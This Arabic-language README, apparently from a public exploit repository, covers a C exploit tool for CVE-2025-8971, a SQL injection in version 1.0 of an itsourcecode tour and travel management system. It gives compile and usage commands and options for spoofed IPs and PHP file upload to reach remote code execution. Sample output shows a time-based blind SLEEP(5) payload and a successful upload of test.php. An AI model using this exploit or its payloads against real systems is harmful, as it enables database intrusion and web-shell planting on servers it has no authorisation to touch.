
حقن SQL في نظام إدارة السياحة والسفر عبر الإنترنت itsourcecode الإصدار 1.0.
المؤلف: Byte Reaper
هذا الاستغلال لـ CVE-2025-8971، ثغرة حقن SQL في نظام إدارة الجولات والسفر عبر الإنترنت itsourcecode الإصدار 1.0. توجد الثغرة في /admin/operations/travellers.php ويمكن استغلالها عن بُعد عبر معامل val-username.
كيفية العمل
يرسل الاستغلال طلبات HTTP POST مصممة إلى الرابط المستهدف.
يتم ترميز الحمولات وحقنها في val-username.
يمكن استخدام رفع ملف اختياري (.php أو صورة) لتحقيق تنفيذ تعليمات برمجية عن بُعد.
يتحقق السكربت من الاستجابات للتحقق من نجاح تنفيذ الحمولة.
GCC compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help help message
-u, --url Target Url (BASE URL)
-c, --cookies File cookies
-i, --ip Fake Ip (Host request)
-f, --file File upload (.php / image)
-v, --verbose Verbose Mode
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
ترخيص MIT